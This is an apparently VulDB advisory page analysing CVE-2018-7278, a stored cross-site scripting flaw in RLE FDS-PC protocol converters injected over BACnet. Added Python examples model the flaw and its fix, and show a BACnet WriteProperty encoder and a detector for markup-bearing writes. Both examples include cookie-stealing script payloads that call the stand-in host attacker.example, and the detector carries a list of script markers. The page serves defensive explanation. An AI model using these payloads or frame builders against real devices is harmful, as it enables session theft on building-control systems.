CVE-2018-7278 in FDS-PC
Summary
by MITRE
An issue was discovered on RLE Protocol Converter FDS-PC / FDS-PC-DP 2.1 devices. Persistent XSS exists in the web server. Remote attackers can inject malicious JavaScript code using the device's BACnet implementation. This is similar to a Cross Protocol Injection with SNMP.
Analysis
by VulDB Data Team • 01/07/2020
CVE-2018-7278 is a persistent (stored) cross-site scripting flaw in RLE Protocol Converter FDS-PC and FDS-PC-DP 2.1 devices. The weakness sits in the embedded web server of these industrial protocol converters, which bridge building-automation protocols such as BACnet to other networks. What makes the bug unusual is the injection path: the JavaScript payload is not submitted through the web interface at all, but is written to the device over its BACnet implementation and later rendered, unencoded, into the web management pages. Any operator who opens those pages then executes the stored script in their browser, and the payload survives across sessions until the stored value is overwritten.
Exploitation follows a well-known pattern, classified under CWE-79 (Improper Neutralization of Input During Web Page Generation) and CWE-94 (Improper Control of Generation of Code). An attacker with network reach to the device's BACnet interface writes a string value containing script into the device; the advisory does not name the specific property, but BACnet exposes several writable text properties (object name, description and similar) that management pages commonly display. Because standard BACnet/IP carries no authentication, that write is available to any host on the BACnet segment, and because the value is stored on the device rather than echoed from a request, the script fires for every subsequent visitor of the affected page. The comparison to Cross Protocol Injection with SNMP is apt: in both cases the web front end trusts data that arrived through a second, unauthenticated management protocol, so filtering applied to HTTP input never sees the malicious value. Only output encoding at the point where the stored value is placed into HTML closes the hole.
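To make the cross-protocol point concrete, the following is an added example (not code from the advisory, RLE, or VulDB). It models the device's BACnet Device object with two writable string properties, a web page that interpolates them, and two write paths: the web UI's own form, which an HTTP-side filter can inspect, and a BACnet WriteProperty, which it cannot. The property names (object-name, description), the instance number and the payload are assumptions chosen for illustration; the advisory does not say which property the real device rendered unencoded.

```python
import html


# Constructed stand-in for the converter's BACnet Device object. Which property the
# real FDS-PC rendered unencoded is not stated in the advisory; object-name and
# description are assumed here because both are writable strings on most devices.
class DeviceObject:
    def __init__(self, instance, object_name, description):
        self.instance = instance
        self.properties = {"object-name": object_name, "description": description}

    def bacnet_write_property(self, prop, value):
        """Path a BACnet WriteProperty request takes: BACnet/IP carries no
        authentication, so any host on the segment reaches this unfiltered."""
        if prop not in self.properties:
            raise KeyError(prop)
        self.properties[prop] = str(value)

    def http_form_update(self, prop, value):
        """Path the web UI's own settings form takes. An HTTP-side input filter
        (or a WAF in front of the web server) only ever sees writes that arrive
        this way, so the naive bracket-stripping below looks like it works."""
        self.bacnet_write_property(prop, value.replace("<", "").replace(">", ""))


PAGE = "<html><body><h1>Device {name}</h1><p>{desc}</p></body></html>"


def render_vulnerable(dev):
    """Interpolates stored strings verbatim, so a value written over BACnet
    becomes live markup in every operator's browser."""
    return PAGE.format(name=dev.properties["object-name"],
                       desc=dev.properties["description"])


def render_fixed(dev):
    """Encodes on output, which neutralises the payload no matter which protocol
    stored it; input filtering cannot achieve that because BACnet bypasses it."""
    return PAGE.format(name=html.escape(dev.properties["object-name"], quote=True),
                       desc=html.escape(dev.properties["description"], quote=True))


def contains_script(page_html):
    """Crude check used only to make the difference between the renders visible."""
    return "<script" in page_html.lower()


# Constructed payload for the demonstration, not taken from the advisory.
PAYLOAD = "<script>fetch('http://attacker.example/?c=' + document.cookie)</script>"


def demo():
    """Returns (page after HTTP-form write, page after BACnet write, hardened page)."""
    dev = DeviceObject(instance=1, object_name="FDS-PC", description="Boiler room")
    # The HTTP form filter strips the angle brackets ...
    dev.http_form_update("description", PAYLOAD)
    via_http = render_vulnerable(dev)
    # ... but the same string written over BACnet lands in the page intact.
    dev.bacnet_write_property("description", PAYLOAD)
    via_bacnet = render_vulnerable(dev)
    hardened = render_fixed(dev)
    return via_http, via_bacnet, hardened


if __name__ == "__main__":
    for label, page in zip(("http form", "bacnet write", "fixed"), demo()):
        print(f"{label:13s} script present: {contains_script(page)}")
```

The fix is deliberately placed in the renderer rather than in either write path: the device has more than one protocol that can populate the same stored string, and encoding at the HTML sink is the only place that covers all of them.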
The operational impact of CVE-2018-7278 goes beyond that of a typical web application bug because of where these devices sit. Protocol converters of this kind act as gateways between building automation networks and the rest of the site, and their web interface is used by the operators who configure them. Script running in such an operator's browser can steal the session cookie, issue requests to the device's own management functions with the operator's privileges (for example changing configuration), read whatever the interface displays, and pivot to other web-based systems reachable from that browser. The payload is JavaScript executing in a browser, not native code executing on the converter itself, but in environments where the device fronts heating, ventilation, air conditioning, lighting or access-control systems, control of the management session is already a serious outcome.
Mitigation should combine immediate remediation with longer-term architectural controls. Organizations should apply vendor firmware updates as soon as they are available and, in the meantime, restrict which hosts can reach the device's BACnet interface, since standard BACnet/IP offers no authentication of WriteProperty requests; segmenting the BACnet network from general IT and from the network that carries operator browser sessions limits both the injection path and the blast radius. A web application firewall in front of the HTTP interface will not see the injection, because the payload arrives over BACnet; the durable fix is output encoding in the web server, so vendors and integrators should verify that patched firmware encodes every stored value at the point where it is rendered. Security assessments of these devices should therefore exercise the protocol interfaces (writing markup into BACnet string properties and checking the web pages afterwards) rather than only the HTTP forms, and BACnet traffic monitoring can flag writes to string-valued properties that contain HTML or script. In ATT&CK terms the execution maps to T1059 Command and Scripting Interpreter (sub-technique T1059.007, JavaScript). Because the payload is stored on the device and fires as soon as an operator opens a routine management page, no phishing lure is required, so a T1566 Phishing mapping and the user-awareness training that goes with it do not address this flaw; network-level restriction of BACnet writes and output encoding do.
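The monitoring idea above, as an added example that is not part of the original page and not based on any RLE or VulDB tooling: a minimal encoder and parser for a BACnet/IP WriteProperty request carrying a CharacterString, plus a detector that flags writes to string-valued Device properties whose value contains HTML or script markup. The wire layout follows the ASHRAE 135 encoding rules for the unsegmented, unrouted case; the sample frames, the device instance number and the payload are constructed for the demonstration, not captured traffic. A real deployment would feed the parser from a capture source (the encoder is here only so the example runs stand-alone), and would need to handle routed NPDUs, segmented APDUs and the other CharacterString encodings, which this parser deliberately rejects.

```python
import struct

BVLC_TYPE = 0x81
BVLC_ORIGINAL_UNICAST = 0x0A
SERVICE_WRITE_PROPERTY = 0x0F          # confirmed service choice 15
OBJ_DEVICE = 8
PROP_DESCRIPTION = 28
PROP_OBJECT_NAME = 77
STRING_PROPS = {PROP_OBJECT_NAME: "object-name", PROP_DESCRIPTION: "description"}
# Markup fragments that have no business in a BACnet string property.
SUSPICIOUS = ("<script", "<img", "<svg", "<iframe", "onerror=", "onload=", "javascript:")


def encode_write_property(instance, prop_id, text, invoke_id=1):
    """Build a BACnet/IP WriteProperty request for a Device object whose value is a
    CharacterString: BVLC header, NPDU, then a confirmed-request APDU."""
    if not 0 <= instance < (1 << 22):
        raise ValueError("device instance must fit in 22 bits")
    if prop_id > 255:
        raise ValueError("only one-byte property identifiers are handled here")
    value = b"\x00" + text.encode("utf-8")          # 0x00 = ANSI X3.4 / UTF-8 encoding
    if len(value) > 253:
        raise ValueError("string too long for the one-byte length form")
    obj_id = (OBJ_DEVICE << 22) | instance
    apdu = bytes([0x00, 0x05, invoke_id & 0xFF, SERVICE_WRITE_PROPERTY])
    apdu += b"\x0c" + struct.pack(">I", obj_id)      # context tag 0: objectIdentifier
    apdu += b"\x19" + bytes([prop_id])               # context tag 1: propertyIdentifier
    # context tag 3 opening, application tag 7 (CharacterString), context tag 3 closing
    str_tag = bytes([0x70 | len(value)]) if len(value) <= 4 else bytes([0x75, len(value)])
    apdu += b"\x3e" + str_tag + value + b"\x3f"
    npdu = b"\x01\x04"                                # version 1, expecting reply, unrouted
    body = npdu + apdu
    return bytes([BVLC_TYPE, BVLC_ORIGINAL_UNICAST]) + struct.pack(">H", 4 + len(body)) + body


def parse_write_property(frame):
    """Return (object_type, instance, prop_id, text) for an unsegmented, unrouted
    WriteProperty carrying a UTF-8 CharacterString, or None for anything else."""
    try:
        if frame[0] != BVLC_TYPE or frame[1] != BVLC_ORIGINAL_UNICAST:
            return None
        if struct.unpack(">H", frame[2:4])[0] != len(frame):
            return None
        if frame[4] != 0x01 or frame[5] & 0x28:       # DNET/SNET present: not handled
            return None
        apdu = frame[6:]
        if apdu[0] >> 4 != 0 or apdu[3] != SERVICE_WRITE_PROPERTY:
            return None
        i = 4
        if apdu[i] != 0x0C:
            return None
        obj_id = struct.unpack(">I", apdu[i + 1:i + 5])[0]
        i += 5
        if apdu[i] != 0x19:
            return None
        prop_id = apdu[i + 1]
        i += 2
        if apdu[i] != 0x3E:
            return None
        i += 1
        tag = apdu[i]
        i += 1
        if tag >> 4 != 7 or tag & 0x08:               # must be application-class tag 7
            return None
        length = tag & 0x07
        if length == 5:                               # extended one-byte length form
            length = apdu[i]
            i += 1
        if apdu[i] != 0x00:                           # only the UTF-8 encoding is handled
            return None
        text = apdu[i + 1:i + length].decode("utf-8")
        if apdu[i + length] != 0x3F:
            return None
        return obj_id >> 22, obj_id & 0x3FFFFF, prop_id, text
    except (IndexError, struct.error, UnicodeDecodeError):
        return None


def flag_suspicious_writes(frames):
    """Detection pass over BACnet/IP frames: report writes to string-valued Device
    properties whose value carries HTML or script markup."""
    hits = []
    for frame in frames:
        parsed = parse_write_property(frame)
        if parsed is None:
            continue
        obj_type, instance, prop_id, text = parsed
        if obj_type == OBJ_DEVICE and prop_id in STRING_PROPS:
            lowered = text.lower()
            if any(marker in lowered for marker in SUSPICIOUS):
                hits.append((instance, STRING_PROPS[prop_id], text))
    return hits


# Constructed traffic, not a real capture: a benign rename, an injection attempt,
# and a truncated frame to show the parser fails closed.
SAMPLE_FRAMES = [
    encode_write_property(4711, PROP_OBJECT_NAME, "FDS-PC Boiler Room"),
    encode_write_property(4711, PROP_DESCRIPTION,
                          "<img src=x onerror=\"fetch('http://attacker.example/?c='+document.cookie)\">"),
    b"\x81\x0a\x00\x0b\x01\x04\x00\x05\x02\x0c\x0c",
]

if __name__ == "__main__":
    for instance, prop, text in flag_suspicious_writes(SAMPLE_FRAMES):
        print(f"device {instance}: markup written to {prop}: {text!r}")
```

The detector keys on the property identifier and the object type rather than on the raw bytes, so the same logic extends to other writable string properties and other object types by adding entries to STRING_PROPS; alerting on any WriteProperty from a host that is not a known BMS controller is a coarser rule that catches the same attack without content inspection.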